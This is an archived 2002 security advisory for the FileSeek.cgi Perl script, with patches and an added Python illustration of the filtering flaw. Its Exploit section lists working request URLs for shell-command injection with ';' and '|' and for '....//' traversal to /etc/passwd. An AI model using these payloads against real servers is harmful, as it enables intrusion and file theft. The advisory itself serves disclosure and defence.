FileSeek cgi script advisory

From: N|ghtHawk (nighthawkat_private)
Date: Tue Apr 16 2002 - 11:42:30 PDT


    The online version is the best one to read:
    http://www.dsinet.org/textfiles/advisories/FileSeek-advisory.txt
    
    
    
    ------------------------------
     FileSeek cgi script Advisory
    ------------------------------
    
    FileSeek.cgi / FileSeek2.cgi
    16/04/2002
    - by Thijs Bosschert (nighthawkat_private)
    
    -------------------
    Vendor Information:
    -------------------
    Homepage        : http://www.cgi-perl.com
    Written by      : Craig Patchett
    Vendor informed
      about bug     : months ago
      mailed advisory: 14/04/02
    Vendor response : none yet
    Version on site : still vulnerable
    
    
    -------------------
    Description:
    -------------------
    FileSeek is a cgi-script from "The CGI/Perl Cookbook" (John Wiley &
    Sons), written by Craig Patchett. It is used to search for and download
    files on a server.
    
    -------------------
    Affected Versions:
    -------------------
    All
    
    -------------------
    Vulnerability:
    -------------------
    There are two vulnerabilities in the script. The first is that the script
    does not filter shell metacharacters out of its arguments, which allows
    command execution. This flaw has also been found by another group; their
    advisory can be found at:
    http://www.russiahack.com/advisories/adviseries112.txt
    
    The second vulnerability is a directory traversal bug which lets you
    read any file on the server. The script strips "../" out of the request
    in a single pass, which can be bypassed with "....//": removing "../"
    from "....//" leaves exactly "../".
    
    
    -------------------
    Exploit:
    -------------------
    
    Command execution vulnerability:
    
    http://host/cgi-bin/FileSeek.cgi?head=&foot=;id|
    http://host/cgi-bin/FileSeek.cgi?head=;id|&foot=
    
    http://host/cgi-bin/FileSeek.cgi?head=&foot=|id|
    http://host/cgi-bin/FileSeek.cgi?head=|id|&foot=
    
    Directory traversal vulnerability:
    
    http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
    http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
    
    -------------------
    Patch:
    -------------------
    
    Patch for command execution vulnerability:
    
    Add the following code below the "Generate the HTML page" part:
    
    ############################################################################
    # Generate the HTML page                                                   #
    ############################################################################
    
       $ARGS{'head'} =~ tr/\|\;/XX/;
       $ARGS{'foot'} =~ tr/\|\;/XX/;
    
    This turns every ; and | in the request into X, so a request containing
    either character no longer names a valid file and results in an error.
    
    
    Patch for directory traversal vulnerability:
    
    Change the following part:
    
       # Make sure they're not trying to access an invalid directory
    
       if ($directory =~ /$DD\.\./) { $directory = '' }
       $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
       $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
    
    Into:
    
       # Make sure they're not trying to access an invalid directory
    
       if ($directory =~ /$DD\.\./) { $directory = '' }
       $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;
       $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;
    
    This makes the filter match on ".." rather than on "../".
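    The two substitutions above, rewritten in Python as an added example (not code from the advisory or from FileSeek): it shows that a single global pass over "../" turns "....//" into "../", what the patched pattern produces instead, that the tr/\|\;/XX/ patch maps only those two characters, and a canonicalization check that validates the final path instead of stripping. The $DD and $ALLOWED_DIR values are assumed.

```python
import os
import re

# Constructed stand-ins for the script's $DD (directory delimiter) and
# $ALLOWED_DIR; the real values come from the FileSeek configuration.
DD = "/"
ALLOWED_DIR = "/var/www/files/"


def strip_original(arg):
    """Mirror of the original substitution: one global pass removing a
    leading ALLOWED_DIR, a leading delimiter, and any '..' followed by the
    delimiter or end of string. Removing '../' from '....//' leaves '../'."""
    pat = rf"(^{re.escape(ALLOWED_DIR)})|(^{re.escape(DD)})|(\.\.({re.escape(DD)}|$))"
    return re.sub(pat, "", arg)


def strip_patched(arg):
    """Mirror of the advisory's patched substitution: every '..' is removed,
    so the '....//' trick no longer yields a parent-directory reference."""
    pat = rf"(^{re.escape(ALLOWED_DIR)})|(^{re.escape(DD)})|(\.\.)"
    return re.sub(pat, "", arg)


def metachar_patch(arg):
    """Mirror of tr/\\|\\;/XX/: only '|' and ';' are mapped to 'X'; the
    patch leaves every other character of the request untouched."""
    return arg.translate(str.maketrans("|;", "XX"))


def escapes_base(arg, base=ALLOWED_DIR):
    """Canonicalize and compare instead of stripping: build the path the way
    the script does (allowed directory followed by the request value),
    normalize it, and report whether the result left the allowed directory."""
    base_norm = os.path.normpath(base)
    target = os.path.normpath(base + arg)
    return os.path.commonpath([base_norm, target]) != base_norm


if __name__ == "__main__":
    crafted = "....//....//etc/passwd"  # constructed request value
    print(strip_original(crafted))                # ../../etc/passwd
    print(strip_patched(crafted))                 # ////etc/passwd
    print(escapes_base(strip_original(crafted)))  # True
    print(escapes_base(strip_patched(crafted)))   # False
```

    Note that the check on the raw request value reports no escape: a directory literally named "...." is inside the allowed tree, and it is the single-pass strip that manufactures the "../". Validate the path you actually open, not an intermediate filtered string.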
    
    
    
    
    -------------------
    



    This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 18:32:42 PDT